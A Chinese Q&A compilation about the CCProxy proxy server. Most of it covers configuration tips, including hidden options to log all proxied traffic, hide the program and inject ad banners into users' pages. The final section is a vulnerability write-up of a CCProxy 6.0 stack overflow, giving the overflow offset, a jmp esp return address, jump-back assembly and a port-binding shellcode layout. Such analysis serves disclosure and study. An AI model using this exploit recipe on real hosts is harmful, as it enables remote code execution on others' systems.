導航:首頁 > 文檔加密 > ccproxy數據加密

ccproxy數據加密

發布時間:2022-08-15 17:16:07

A. 怎麼對ccproxy設置高級隱藏

CCProxy的高級設置大全:

CCProxy是我們常用的一款國產代理軟體,其實他還有許多高級功能我們沒有注意過,現收錄部分如下:

怎樣修改帳號管理所支持的帳號數

默認值是300。對應CCProxy.ini里的MaxUserCount。

怎樣修改時間安排的支持數目

默認值是20。對應CCProxy.ini里的MaxTimeSchele。

怎樣修改網站過濾的支持數目

默認值是20。對應CCProxy.ini里的MaxWebFilter。

怎樣修改CCProxy的同時在線支持數目

默認值是300。對應CCProxy.ini里的MaxConnection。

怎樣攔截進出代理伺服器的所有數據

本功能原來是方便用戶反饋程序錯誤用的。在主界面上,按住Ctrl鍵,雙擊"0/0"。所有攔截的數據都保存到C:\log.dat。最多保存256K數據。此功能影響代理伺服器速度,需即時關閉。對應CCProxy.ini里的BugTrace。

怎樣在線檢查CCProxy最新版本

此功能不會將您的電腦的任何信息發送給遙志軟體,請放心使用。
雙擊主界面上的U字母。

怎樣修改界面的連接數曲線(綠色)的顯示高度和流量帶寬曲線(黃色)顯示高度?

在界面上單擊滑鼠右鍵,在彈出的窗口中修改度默認是300和256,

怎樣調出Windows任務管理器?

雙擊主界面上的0/0。

怎樣知道所運行的CCProxy的發布時間

雙擊主界面上的時間數字。

怎樣快速進到CCProxy安裝目錄

按著Ctrl鍵,雙擊主界面上的時間數字。

怎樣知道今天的農歷日期

按著Shift鍵,雙擊主界面上的時間數字。

怎樣實現啟動CCProxy時自動撥號和關閉CCProxy時自動斷線

對應CCProxy.ini里的DialWhenStartup和DisconnectWhenShutdown。將值設成1時,表示打開這個功能。在使用此功能前,要設置好代理伺服器的撥號選項。

怎樣讓伺服器撥號閑置時自動斷網並關機

此功能由黑龍江天衣有縫提出。首先要設置好撥號閑置自動斷開功能,然後將CCProxy.ini里的
ShutDownWhenIdle=1。

怎樣實現定時關機

CCProxy.ini
[ShutDown]
Enable=1
Time=20:00
表示20:00關機

CCProxy.ini
[ShutDown]
Enable=1
Time=05:05
表示05:05關機

此功能最好在CCProxy
NT服務方式下運行,這樣CCProxy可以獲得更高的許可權來關閉電腦

怎樣修改網站過濾伺服器返回的字元串

CCProxy.ini里的
WebSiteForbidden對應站點過濾伺服器返回的字元串。注意,要保留%s。WebContentForbidden對應內容過濾伺服器返回的字元串。
如果WebSiteForbidden里填寫的是一個文件絕對路徑名,那麼伺服器會讀取該文件來作為過濾網站返回信息。如:WebSiteForbidden=c:\alert.htm。
如果WebContentForbidden里填寫的是一個文件絕對路徑名,那麼伺服器會讀取該文件來作為內容過濾返回信息。如:WebSiteForbidden=c:\alert.htm。

怎樣修改網頁身份認證里的字元串

CCProxy.ini里的
WebAuthTitle對應認證對話框里的字元串「CCProxy
Authorization」。AuthorityFailed對應認證失敗後伺服器返回的字元串。

怎樣實現驗證失敗時顯示指定的htm文件?

CCProxy.ini里的
AuthorityFailed里輸入htm文件的絕對地址。例如:AuthorityFailed=f:\1.htm,表示顯示F盤根目錄下的1.htm文件。

怎樣實現帳號排序?

"帳號管理"→
點擊"用戶名"、"IP地址"、"MAC地址"、"連接數"任一欄位名即可按所選欄位名排序,連續點擊則分別按"降序"、"升序"分別排列。確定後,將按照排序結果保存帳號。

怎樣實現遠程撥號?

1)
在伺服器上手工建立一個撥號連接,並且測試一下這個撥號連接是否有效。
2) "設置"-> 選擇"遠程撥號"。
3)
"設置"->"高級"->"撥號":在"撥號列表"中選擇 1)中建立的撥號連接。在"撥號用戶名"、"撥號密碼"里填上正確的上網帳號信息。
4)
在帳號管理中編輯或新增用戶,並選擇允許該用戶"遠程撥號"。
5) 客戶端的瀏覽器首先要設置好HTTP代理服務。然後在瀏覽器中輸入
http://ccproxy.connect 就可以撥號了,如果客戶端使用
http://ccproxy.connect.電話號碼.用戶名.密碼,則用指定的電話號碼和用戶帳號信息撥號。
6) 斷開撥號網路連接則在瀏覽器中輸入
http://ccproxy.disconnect

怎樣實現通過客戶端使伺服器自動撥號?

1)"設置"->
選擇"遠程撥號"。
2)"設置"->"高級"->"撥號"->
選擇"允許自動撥號",然後在相應代理協議前打勾。
3)"帳號"-> 編輯或新建帳號 ->
選擇"遠程撥號"。
這樣,只要被允許的客戶端使用被允許的協議(HTTP/FTP/TELNET等)就可以實現伺服器自動撥號功能。

怎樣實現隱藏任務欄圖標 ?
編輯ccproxy.ini,在
[System]
下增加一行Allhide=1。去掉這一行則顯示圖標。
或:"設置"->"高級"->"其他":選擇"隱藏所有"。
若要重新顯示主界面,只需再運行一次CCProxy即可(CCProxy自動判斷,不會在同一個目錄下啟動多個進程)。

怎樣使用熱鍵激活界面?

編輯CCProxy目錄下的CCProxy.ini,把EnableHotKey=0改為1,然後保存文件並重啟CCProxy軟體。以後當軟體隱藏後,只要按下"CTRL+ALT+C",界面會重新顯示。

怎樣實現管理員密碼控制?

"設置"->"高級"->"其他":選擇"密碼保護",然後在相應的密碼框中輸入密碼。這樣每次修改設置、增加或編輯帳號、退出程序都必須輸入正確密碼方可。
若需要每次啟動時必須輸入密碼則再選擇"啟動時需要密碼"。建議一般情況下不選擇。

怎樣讓客戶端顯示廣告條?

這是一個相當有趣的功能,最初由上海復旦大學Hyne提出。
默認狀態是關閉。對應CCProxy.ini里的AddMessage。AddMessage=1,表示開放廣告條功能。同時在CCProxy運行目錄下寫一個addmessage.htm文件(小於4096位元組),當然這個文件的編寫很要技巧。
提供兩個非常經典的例子:ads1.zip(Hyne提供)
ads2.zip(testa提供) 歡迎提供更多好的例子。
另外,可以在界面中按住shift雙擊0/0,在彈出的對話框中選擇,

怎樣往客戶端發送信息?

客戶端如果是Win98,要求已經運行了windows目錄下的WINPOPUP.EXE。如果是Win2000/NT,則系統已經自帶了消息接收功能。選中需要發信息的帳號點擊右鍵,在第一個編輯框里輸入接收者的機器名,第二個編輯框里輸入要發送的文字,點擊確定就可以發送信息到客戶端了。如果上面的對話框里輸入的是"*"號,可以發送到區域網里的任何一台機器。

怎樣實時觀測客戶端訪問內容(網站)以及客戶端連接數和流量?

雙擊主界面綠色網格即可,並且雙擊左上角的"當前連接信息」左邊那個圖標,可以切換觀察狀態。

怎樣實現流量統計和計費?

1)
在CCProxy的"設置"—"高級"—"日誌"—"運行流量統計"前面打勾,並設定"流量統計間隔時間"(默認為10分鍾),這樣系統會在log文件夾中生成一個文件(如data20030613.txt),並每隔10分鍾系統在該文件中寫入一次流量統計數據;
2)
點擊"流量統計",即可打開流量統計文件,觀察到流量記錄(前面的為流進數據,後面的為流出數據);
3)
下載CCReport插件,可以根據統計出的流量,計算出每用戶的使用費用。

怎樣實現埠映射?

在"設置"頁面點擊"埠映射"後面的E按鈕,進行相應的設置即可:

怎樣設置二級代理?

"
設置"->"高級"->"二級代理":選擇"啟用二級代理",在代理地址中輸入上級代理伺服器IP或計算機名稱,選擇代理協議
HTTP/HTTPS/SOCKS,再輸入對應的埠。若需要驗證密碼,則選擇"需要驗證",在"用戶名"、"密碼"框中分別輸入指定信息。需要注意的是:
1)
若上級提供了SOCKS5服務,則可以為下級提供包括HTTP/FTP/GOPHER/SOCKS/RTSP/MMS/TELNET等協議在內的幾乎任何服務,本程序可以全部自動轉換;若上級提供了HTTPS服務,則絕大部分服務也可為下級提供,除了QQ/PP等UDP協議;若上級只提供了HTTP服務,則下級只能使用HTTP/FTP/GOPHER/SOCKS/TELNET等一般協議,RTSP/MMS等協議無法轉換。
2)
6.0版支持不同的協議可以設置不同的二級代理或者不使用二級代理,即每一個協議都可以使用不同的上級代理和不同的協議或者部分協議使用上級代理,而部分協議可以不使用上級代理,也可以全部使用同一個上級代理和協議。

怎樣同時運行多個ccproxy進程?

編輯ccproxy.ini,修改EnableMultiRun=1即可,但須安裝在不同目錄,使用不同埠。

怎樣訪問帶域驗證的網頁?

可以只設置socks代理來實現訪問,CCProxy要開放DNS服務和SOCKS4服務,客戶端的DNS里要設置伺服器的IP地址。

怎樣結合殺毒軟體檢查所有通過代理發送和接收的郵件病毒?

編輯ccproxy.ini,修改AntiVirusGate=1表示啟用郵件殺毒。目前我們測試過的軟體有瑞星2003版和Norton
2003版,只要伺服器上安裝了這樣的殺毒軟體,就可以實現代理伺服器郵件殺毒功能。

如何控制流媒體視頻帶寬?

編輯ccproxy.ini,修改[MMS]項:EnableRecord=1

如何屏蔽埠和屏蔽IP?

編輯ccproxy.ini,修改[DestDisable]項:
PortDisabled=1表示啟用埠屏蔽,Port=25;110;80表示屏蔽這些埠;
IPDisabled=1表示啟用IP屏蔽,IP=0.0.0.0-202.0.0.0表示屏蔽這個范圍內的IP

用戶通過web方式發送郵件時如何禁止發送附件?

在"內容過濾"里加入";; filename="。(注意:
在分號後面有一空格,如果有其餘過濾的內容如chat等必須放在第一位,

怎樣在客戶端Ping互聯網地址?

1)首先確認CCProxy的Telnet代理已經打開。
2)假設代理伺服器地址是192.168.0.1,在客戶端上輸入命令
telnet 192.168.0.1,然後回車。
3)在提示符CCProxy Telnet>後,輸入你要ping的地址,如ping
sina.com.cn ,然後回車。

在遠程終端服務(Terminal
Services)下運行CCProxy需要注意的事項?

如果在遠程終端服務(Terminal
Services)下運行CCProxy,而且以NT服務方式運行,需要設置CCProxy.ini里的一個參數:TerminalServices=1。顯示CCProxy界面只需要再次運行CCProxy就可以了。

怎樣在代理伺服器CCProxy里巧妙的利用Auto
Proxy功能?

在代理伺服器CCProxy里巧妙的利用Auto
Proxy功能,請看詳細設置

C源代碼:客戶端怎樣通過proxy進行連接,支持https,
socks5代理?

客戶端通過proxy進行連接,支持https,
socks5代理的C源代碼請看

如何突破屏蔽代理訪問的網站?

有些網站屏蔽代理訪問,可以通過編輯CCProxy目錄下的CCProxy.ini來突破屏蔽,把EnableProxyConnection=0改為1,然後保存文件並重啟CCProxy軟體。詳細設置>>

如何綁定伺服器IP地址?

編輯CCProxy目錄下CCProxy.ini文件,把ServerBindIP=0.0.0.0改為伺服器接入線路的IP地址,然後保存文件並重啟CCP
roxy軟體。當伺服器有多條線路接入時,管理員可以通過此功能合理分配帶寬資源。詳細設置>>

如何讓目標網站無法得知你是從哪個網站進入該網站?

編輯CCProxy目錄下CCProxy.ini文件,把EnableReferer=0改為1,然後保存文件並重啟CCProxy軟體。此功能便於保密,讓目標網站無法得知你是從哪個網站進入該網站的。詳細設置>>

如何關閉gzip,加強廣告條功能的應用范圍?

編輯CCProxy目錄下CCProxy.ini文件,把EnableGzip的值改為0,然後保存文件並重啟CCProxy軟體,此功能可以大大加強廣告條功能的應用范圍。

B. 怎麼設置代理伺服器,讓區域網內的用戶共享上網

不知道你所說是兩台台式機有線連接的,還是兩台筆記本無線連接,所以就都回答了 吧。
台式機有線連接共享上網:
1..主機)(能上網那台)設置。打開「本地連接」點「屬性」然後選「高級」,在「internet連接共享」部分,勾選「允許其他網路用戶通過此計算機的internet連接來連接(N)」然後「確定」即完成設置。
2.設置IP,設置主機、從機IP在同一網段192.168.1.1、192.168.1.2
從機網關和DNS伺服器指向主機IP
3,最後,在主機電腦下,打開網上鄰居,點擊設置家庭或小型辦公網路,設置連接方法為:這台計算機直接連到Internet,我的網路上的其他計算機通過這台計算機連接到Internet.

兩台筆記本無線共享上網:
在從機電腦下,打開網上鄰居,點擊設置家庭或小型辦公網路,設置連接方法為:此電腦通過網路上的其他計算機連接到Internet.通過以上的設置操作正常的話在主機接入internet下兩台筆記本就可以共享上網了
2、主機無線網卡設置。打開「無線網路連接」點「屬性」->「無線網路配置」->「高級」,選「僅計算機到計算機特定(C)」->「關閉」;
然後仍在「無線網路配置」中的「首選網路」點「添加」打開「無線網路屬性」,「網路名(SSID)」任意設一名稱,如shell,「網路身份認證」默認開放式,「數據加密」默認WEP,去掉「自動為我提供密鑰(H)」前的勾自己來設「網路密鑰」,比如1234567890,這樣別人就要有這個密碼才能連接,防止盜連,「確定」即基本完成了主機的設置如下圖,
還有最後一項:設置無線網卡的IP,注意:無線網卡的IP段不能和上面設的有線的在一個段,即如果有線網卡IP段在1段,則無線網卡IP段就不能設成1段。比如有線網卡的IP地址為:192.168.16.49,則無線的可以設為192.168.17.1,掩碼默認即可。
另一台筆記本(從機)的設置。很簡單,從機無線網卡的IP設為192.168.17.36,掩碼默認,網關設為192.168.17.1,DNS設為主機電腦的首選DNS。然後即可打開「無線網路連接」通過「查詢無線網路」「刷新網路列表」找到剛才設的無線網路「shell」,雙擊它輸入上面設的密碼「1234567890」即大功告成!
1. 最後,在主機電腦下,打開網上鄰居,點擊設置家庭或小型辦公網路,設置連接方法為:這台計算機直接連到Internet,我的網路上的其他計算機通過這台計算機連接到Internet.
2. 在從機電腦下,打開網上鄰居,點擊設置家庭或小型辦公網路,設置連接方法為:此電腦通過網路上的其他計算機連接到Internet.通過以上的設置操作正常的話在主機接入internet下兩台筆記本就可以無線共享上網了

C. ccproxy 這個軟體怎麼用

CCProxy簡介及優點介紹

記得我剛開始擺弄代理伺服器軟體的時候,對於什麼是代理伺服器的概念還不是很懂,在當時的想法就是要實現多機上網,自己一方面也就是多看一些書,另一方面就是多試一試了。後來居然自己用Wingate把宿舍里的兩台計算機弄得能同時上網了,當時真是喜不自勝,再後來居然一發不可收拾。現在這類軟體現在用的久了,就也看的出一些問題,分得出一些優缺點了。我現在就先來介紹介紹這款代理伺服器軟體「CCProxy」吧:

一、CCProxy簡介:

「CCProxy」全稱是「代理伺服器CCProxy」,是一款由北京遙志軟體公司開發的免費的中文網路代理伺服器軟體,雖說同是中國人開發的代理軟體,但那款在矽谷開發出的Sygate可是英文的。用CCProxy可以輕松實現區域網的「共享Internet」,並且它只用安裝在伺服器上。由於它那直觀的界面,所以它的設置非常的簡單,一般人都可以輕松掌握。但不可否認,它的功能也很少,只能實現IE、OICQ和FTP的功能,在與SocksCap32結合的情況下,支持客戶端使用Outlook收發郵件,不過它的賬號管理功能還是非常有特色和實用的。所以我非常建議開網吧的用戶使用這款軟體,因為據我對北京各大網吧以及各大學的觀察,發現在這種公共場合上網的人,無非也就是:瀏覽、聊天和收發信件(我想,之所以會有人說現在上網是三大功能,估計也就是這些人占的比例過大引起的),可收發信件也都是用WEB方式,所以都大可不必另外費心在客戶機上實現OUTLOOK的功能。當然,這只是它的簡單介紹,如果沒有突出的幾項優點,我可是不會專門說它的。

二、CCProxy的幾處優點:

1.它體積極小,解壓縮以前只有138K,解完壓縮也才336K,這對於那些動不動好幾兆的大代理軟體來說可真是不敢想像,並且是一個綠色軟體(是不是很潮流呀?),只要在伺服器上解完壓縮,然後對網路中的計算機進行相應的設置就行了!
2.支持Windows 98/Me、Windows 2000/NT多種操作系統,還支持專線,modem, ADSL, ISDN等多種上網方式,如此全面的支持是不是想不到呀。
3.經過設置後可以實現IE,OICQ的使用以及FTP的功能。就我的看法,這些功能對網吧來說已經足夠了,對於Wingate里的好多功能網吧幾乎就是根本用不上的。
4.它是中國人自己編寫的非常直觀易用的中文軟體,並且具有簡單的賬號管理功能。

5.它是一個完全免費的軟體,這也是最為重要的一點,這可讓您不必擔心它會過期。對於Wingate或Sygate,您是不是時時擔心過了三十天試用期該怎麼辦,如果只是因為一個試用期的問題而又要對計算機進行一次調整豈不是很不值得?如果您正在或要開網吧,聽到這個消息,心裡是不是很激動呀?

由於CCProxy的安裝過程比較簡單就不多說了。它的界面非常直觀,如圖1所示。按一下面板上的「設置」按鈕,將進入「設置」窗口。在這里,你可以設置HTTP代理和Socks代理所使用的埠,如圖2所示。同時,在這個窗口裡還可以設置CCProxy代理的服務,如郵件代理、DNS服務等等。

面板上的「賬號」按鈕可以讓您設置區域網中允許上網的電腦(如果您不填入就是默認允許區域網中的所有用戶都能上網),如圖3所示:在用戶姓名中填入您允許上網的客戶機名,用戶IP地址中填入那台客戶機的IP,這樣就可以實現對上網用戶的管理了。單擊「當前用戶信息」按鈕,就可以查看該用戶上網的情況了。對於您來說,這個簡單的用戶管理功能是不是已經足夠用了?平常系統面板的綠色網格會動態顯示網路的數據流量,您還可以通過雙擊綠色網格來查看網路用戶比較詳細的使用情況。

D. ccproxy怎麼用

你的問題和這個類似!

這是我的博客,裡面有詳細的圖文教程。。
http://www.bonyliu.com/read.php?2

另外那還可以參考CC的幫助
由於CCProxy的安裝過程比較簡單就不多說了。它的界面非常直觀。按一下面板上的「設置」按鈕,將進入「設置」窗口。在這里,你可以設置HTTP代理和Socks代理所使用的埠,如圖2所示。同時,在這個窗口裡還可以設置CCProxy代理的服務,如郵件代理、DNS服務等等
我會些基本的。原來在學校就這么設置的。
1.打開CCproxy的設置選項,SOCKS/MMS都設置為1080。你代理的,和他接受的。要一致 。
2.打開帳號,允許范圍里選擇:允許部分。然後新建在IP地址/IP段里輸入同事的IP地址:191.168.1.13 。保存確定。確定,推出帳號管理。
3.在CCproxy里看到有數據流,證明成功。
4.同事那裡,如果要登錄QQ可以在QQ高級設置里輸入代理地址就是你的IP,注意SOCKS/MMS要一致。
5.設置的時候,其它的是默認的。我沒改過。
6.如果不行,在第2步里,在輸入IP地址後,下面有個MAC地址前打勾,然後點後面的問號自動生成一段地址段。添加到你同事的帳號下試試。
7.最後注意,我使用的CCproxy是演示版,只限制代理3個用戶。
8.好了,完了,知道的就這么多了,希望能幫上忙!
客戶機在IE屬性 連接 區域網 設置就可以了!

E. ccproxy的設置問題!

CCProxy使用說明
1.代理伺服器ccproxy須兩塊網卡一快網卡連接外網(進)另一塊網卡連接區域網(出),ccproxy 是一款功能強大的代理共享管理軟體,所以代理伺服器要使用兩塊網卡。
2.確認伺服器和區域網連接通暢,能夠相互ping成功.
3.伺服器區域網的網卡IP不要和外網的網卡IP在同一個網段內,區域網的網卡只設置IP地址和子網掩碼,以防止路由沖突。
4.客戶端的IP地址和伺服器區域網的網卡IP在同一個網段內,網關和dns為區域網網卡的IP地址。
伺服器設置:
5.下載最新版本CCProxy代理軟體 http://hi..com/%C5%F9%F6%A8%CE%DE%CF%BE/blog/item/6e29d2f4a8c315def2d38558.html下載後在伺服器安裝,默認全部點擊next完成安裝。CCPROXY安裝成功後,如果沒有出現報錯信息或埠沖突,接下來直接設置客戶端就可以了。(對公司的安全有較高需求可以設置點擊面版的賬號按扭您可以通過「新建」將用戶添加進去,或通過「自動掃描」直接添加用戶,包括用戶的「驗證類型」、「時間安排」以及通過「網站過濾」設置屏蔽特定網站和內容,允許用戶上指定的網站,或禁止用戶上某些網站.根據公司的要求來設置。)
客戶端設置:
6.CCProxy安裝完畢.接下來設置客戶端IE.假設安裝代理伺服器CCProxy機器的區域網網卡的IP地址是:192.168.0.1,在客戶機上選擇IE瀏覽器->菜單"工具"->"Internet選項"->"連接"->"區域網設置"->選中"使用代理伺服器"->"高級"->"代理伺服器設置"。取消"對所有協議均使用相同的代理伺服器"。
在"HTTP"中填上代理伺服器地址192.168.0.1,埠為808;
在"Secure"中填上代理伺服器地址192.168.0.1,埠為808;
在"FTP"中填上代理伺服器地址192.168.0.1,埠為808;
在"Gopher"中填上代理伺服器地址192.168.0.1,埠為808;
在"Socks"中填上代理伺服器地址192.168.0.1,埠為1080。
7. 保存退出,客戶機實現代理上網。

http://hi..com/%C5%F9%F6%A8%CE%DE%CF%BE/blog/item/6e29d2f40c2071dff3d3857d.html

CCProxy 越是最新版越是不穩定,本人親身體驗。

F. Ccproxy的功能原理

CCProxy是一個國產的支持HTTP、FTP、Gopher、SOCKS4/5、Telnet、Secure(HTTPS)、News(NNTP)、 RTSP、MMS等代理協議的代理伺服器軟體。因為其簡單易用、界面友好,非常適合在對流量要求不高的網路環境中使用,所以在國內有很多初級的網管喜歡用這個軟體,有時候我在公司上網也要用它做代理。前些日子我測試發現CCProxy 6.0版本存在多處緩沖區溢出漏洞,可以導致攻擊者遠程執行任意代碼。

TIPS:什麼是Gopher、RTSP、MMS?

Gopher是Internet上一個非常有名的信息查找系統,它將Internet上的文件組織成某種索引,很方便地將用戶從Internet的一處帶到另一處。允許用戶使用層疊結構的菜單與文件,以發現和檢索信息,它擁有世界上最大、最神奇的編目。

RTSP是Real Tranfer Stream Protocol的縮寫,翻譯為實時傳輸流協議,用來傳輸網路上的流媒體文件,如RM電影文件等,它的下載方法請看後文《悄悄下載流媒體》。

MMS是Multimedia Messaging Service的縮寫,中文譯為多媒體信息服務,它最大的特色就是支持多媒體功能,可以在GPRS、CDMA 1X的支持下,以WAP無線應用協議為載體傳送視頻短片、圖片、聲音和文字,彩信就算MMS協議中的一種。

漏洞發現過程

其實發現這個漏洞是很偶然的,當時在考慮公司產品的黑盒測試方案的時候,我想使用模板+測試用例的方式來進行網路部分的邊界測試。這是比較傳統的黑盒測試方法,其核心內容就是把網路協議包分塊,然後制定出對各個塊的測試策略,最後按照策略對所有塊逐步進行測試。這種測試方法的好處在於可以有效的控制測試進度,以及可以比較詳細地測試一個網路協議的所有部分,而且在測試過程中還可以不斷地加入新的測試用例,以完善測試計劃。測試程序的編寫則可以使用腳本語言或C來完成。

TIPS:什麼是黑盒測試?

黑盒測試法把程序看成一個黑盒子,完全不考慮程序的內部結構和處理過程。黑盒測試是在程序介面進行的測試,它只檢查程序功能是否能按照規格說明書的規定正常使用,程序是否能適當地接收輸入數據產生正確的輸出信息,並且保持外部信息的完整性。黑盒測試又稱為功能測試。

我就是用這種方法測試公司的產品的時候,恰好當時在公司內部網之間使用CCProxy做代理伺服器,因為測試HTTP協議要通過這個代理,所以測試過程中發現CCProxy崩潰了,也因此發現了這個漏洞,算是偶然吧。

漏洞分析過程

CCProxy的HTTP代理埠默認是808,這個埠可以在其界面中進行更改。漏洞的原理很簡單,就是對CCProxy的 HTTP代理埠發送URL超過4056位元組的畸形請求,CCProxy就會發生堆棧溢出。後來發現,不僅僅是GET請求存在此問題,所有POST、 HEAD等請求也都會導致溢出。在分析其原理後又發現CCProxy的Telnet代理也存在該問題。

現在來詳細介紹一下我分析這個漏洞的過程。在發現了發送超長請求可以導致CCProxy出錯以後,就開始分析溢出點以及利用限制。所要用到的工具是SOFTICE調試器和IDA反匯編工具。

TIPS:很多人都知道使用WINDASM反匯編,但經過它反匯編出來的代碼非常簡單,很不容易看明白,但IDA就不一樣了,它不但會反匯編程序,並會盡量分析程序,並加上相應的注釋。正因為這樣,IDA反匯編一個大的程序會花非常長的時間。

整個調試分析漏洞的過程如下:首先在SOFTICE中下斷點:Bpx ntdll!KiUserExceptionDispatcher,這個命令的意思就是程序運行到Ntdll.dll中的 KiUserExceptionDispatcher就停下來,交給SOFTICE進行處理。KiUserExceptionDispatcher這個函數是Windows的異常處理過程中的很重要的一個步驟,它負責派發用戶層空間發生的所有異常到異常鏈中的異常處理函數地址,每當在用戶層空間發生異常的時候就會調用這個函數。SOFTICE默認是沒有載入Ntdll.dll的,所以我們可以通過DriverStudio套件中的一個叫做「Symbol Loader」的工具的Load EXPorts來載入這個DLL文件。
設好斷點後,就用一個簡單的程序向808埠發送「GET /AAAA[...4056 bytes] HTTP/1.0<回車><回車>」這樣的超長字元串,其中包含4056個A的超長URL。發送之後SOFTICE會跳出來並停在KiUserExceptionDispatcher斷點上,這時候用「dd (*(esp+4))+b8」命令來查看出錯時的EIP地址,這是因為KiUserExceptionDispatcher的函數參數是一個指向保存異常發生時的寄存器的結構,該結構從偏移0x8c的位置開始保存寄存器值,其具體保存寄存器值如下:

0x08c Gs

0x090 Fs

0x094 Es

0x098 Ds

0x09c Edi

0x0a0 Esi

0x0a4 Ebx

0x0a8 Edx

0x0ac Ecx

0x0b0 Eax

0x0b4 Ebp

0x0b8 Eip

0x0bc Cs

0x0c0 EFlags

0x0c4 Esp

0x0c8 Ss

用「dd (*(esp+4))+b8」命令發現出現異常的EIP是0x41414141,我們知道0x41就是A的ASCII碼,所以現在已經證實我們發送的超長字元串已經覆蓋了某個函數的返回地址,導致該函數返回的時候返回到0x41414141這樣的地址。此時退出SOFTICE就會彈出 「0x41414141指令引用0x41414141的內存。該內存不能read。」這樣的應用程序錯誤對話框。

TIPS:「0x41414141指令引用0x41414141的內存。該內存不能read。」這種是典型的溢出提示,明確告訴我們溢出的地址和錯誤,對進一步分析溢出很有好處。

接下來,我們還需要知道究竟是什麼地方導致函數返回地址被覆蓋的。因此我們逐漸減少發送的字元串長度,發現當發送4039位元組時就不會導致出錯了。由於堆棧和返回地址被覆蓋,我們無法看到導致溢出的地址到底是哪裡,但是根據經驗推測,這可能是一個由Strcpy、Strcat或Sprintf等函數導致的溢出。因此我們在這些函數下斷點,然後再次發送4056位元組的長URL命令。但是發現沒有在這些函數中斷下來,證明溢出過程並沒有調用這些函數。
到了這里似乎沒有好的辦法能夠確定溢出位置了,但是通過觀察發生溢出後的堆棧內容,可以看到根據當時的堆棧中的連續大片的「AAAA……」和開頭的時間和 「unknown Web」字元串等信息得知,當對堆棧中對這些地址寫入內容的時候會導致覆蓋返回地址,所以我們直接對堆棧地址設寫斷點,使用命令「bpmd 01977908 w」來對0x01977908的地址設一個寫操作斷點,這個地址是我們通過觀察溢出發生後的ESP來得到的,因為這應該就是函數返回之後的ESP,即棧頂地址。但是這個地址是不固定的,可能不同的系統上這個地址也不一樣,即使在同一個系統上,這個地址也隨每次CCProxy進程的啟動而不同。但是在同一個系統上,一般試幾次就會使用同樣的地址,所以我們只需要多試幾次就肯定能夠中斷下來了。在設斷點之前首先要用Addr ccproxy來進入CCProxy的進程地址空間。

經過仔細分析發現,當調用0040A410這個函數之前,會進行壓棧操作,這個壓棧恰好會把函數返回地址寫入到堆棧01977908的位置,所以我們有理由相信就是調用這個0040A410這個函數的過程當中導致了溢出。在0040A410函數入口出設斷點,然後發送溢出字元串,中斷後按F12(即執行到函數返回),可以看到恰好返回到0x41414141的地址,這就印證了我們的推測,溢出確實發生在0040A410函數當中
然後我們用IDA來反匯編CCProxy.exe來看看0040A410函數到底進行了哪些操作。反匯編的代碼如下:

text:0040A410 sub_40A410 proc near ; CODE XREF: sub_408A10+114 p

.text:0040A410 ; sub_408A10+262 p ...

.text:0040A410 mov eax, 280Ch

.text:0040A415 call __alloca_probe ;分配0x280c大小的緩沖區

.text:0040A41A mov eax, dWord_501D04

.text:0040A41F push ebp

.text:0040A420 mov ebp, [esp+2814h] ;這是要記錄的內容,作為參數傳入

可以看到這個函數調用「__alloca_probe」函數來進行緩沖區分配,它和普通函數調用Sub esp,xxx的方式來分配緩沖區有點不同,這是因為需要分配的緩沖區太大,直接減ESP可能會導致直接到達未分配的地址空間,所以需要用 「__alloca_probe「來分配這個大緩沖區。

我們再繼續跟蹤這個函數,發現到0040A607的指令時覆蓋了函數的返回地址。代碼如下:

.text:0040A5F1 lea ecx, [esp+414h]

.text:0040A5F8 push ebp

.text:0040A5F9 push ecx

.text:0040A5FA lea edx, [esp+1820h]

.text:0040A601 push offset aSS_0 ; "[%s] %s"

.text:0040A606 push edx

.text:0040A607 call _sprintf
在這個調用了「_sprintf「函數,按照「[日期] 內容」的格式存入0x1820大小的局部字元串緩沖區中,由於沒有限制長度,所以導致了緩沖區溢出。再仔細查看發現「_sprintf」函數是在 CCProxy自己的代碼段裡面實現的,而沒有調用「msvcrt.dll」導出的Sprintf函數,難怪我們前面在Sprintf函數下斷點沒有攔截到!

說句題外話,現在市場上有些防溢出軟體產品是利用攔截系統的字元串拷貝函數然後回溯堆棧的方法,並宣稱從根本上解決了系統緩沖區溢出的問題。這根本就是無稽之談,因為很多溢出都是軟體自己的代碼實現導致溢出的,例如這個CCProxy溢出這樣,根本就不調用任何系統函數,所以那種保護方法並不能從根本上解決溢出的問題。

在0040A410函數返回的時候,就會返回到被覆蓋的地址去。代碼如下:

.text:0040A700 add esp, 280Ch ;恢復堆棧

.text:0040A706 retn ;返回

到這里我們已經可以看出,0040A410這個函數其實是一個記錄CCProxy日誌的函數,它按照「[日期] 內容」的格式來記錄日誌,但是在構造日誌字元串的時候沒有限制長度,所以導致了緩沖區溢出。我們已經找到了導致溢出的位置,接下來就要看看如何利用這個漏洞了。

漏洞利用

要利用漏洞,就要找到覆蓋返回地址的字元串偏移。我們可以通過發送AAAABBBBCCCCDDD……這樣的組合字元串看到底是哪裡覆蓋了返回地址。經過一番分析,得知在4056的偏移處恰好覆蓋了函數返回地址。所以我們這樣來設計溢出字元串:

GET /AAAA…. shellcode jmp esp jmp back HTTP/1.0

其中「AAAA……」這樣的字元串是為了在執行ShellCode之前騰出足夠的空間,因為字母A所對應的CPU指令是INC ECX,即一條無實際作用的指令,相當於傳統的NOP指令,但是它比NOP指令的好處在於它是可顯示的字元,不易導致錯誤。而ShellCode是一個普通開埠的ShellCode,對其中的字元無任何特殊要求。Jmp esp是一個包含Jmp esp指令的地址,把它作為覆蓋函數的返回地址,這樣當函數返回的時候就會跳到這個地址去執行Jmp esp指令,因為此時的ESP恰好指向函數返回地址後面的地址,即隨後的Jmp back指令。這個指令是一串跳轉指令,用來跳過Jmp esp地址和ShellCcode,執行到前面的AAAA……,即NOP指令,以便最後執行到shellcode當中。這里我們要選用一個比較通用的 jmp esp地址,如果是系統DLL中的Jmp esp地址,可能會隨系統打了不同的SP而有不同的地址,所以我們選擇0x7ffa54cd這樣的地址,它在同一類Windows系統(例如中文版 windows 2000)當中是固定的。Jmp <層>Back指令我們用這樣的匯編指令:

mov ecx,25414141h ;把ECX設為0x25414141

shr ecx,14h ;把ECX右移0x14位,讓ECX變為0x254

sub esp,ecx ;把ESP減去0x254

jmp esp ;跳到此時的ESP去

這樣把ESP減去0x254就可以跳過前面的返回地址和ShellCode,這樣一來就能夠恰好跳到shellcode前面的NOP指令去執行了。
這樣設計好溢出串,並編寫程序保證jmp esp恰好覆蓋返回地址,發送,果然溢出成功,並開出了shellcode指定的埠。這樣exploit是不是就算是完成了呢?於是我到外網找了一個安裝了CCProxy的肉雞試了一下,可是沒有成功。奇怪了,問題究竟出在哪裡呢?
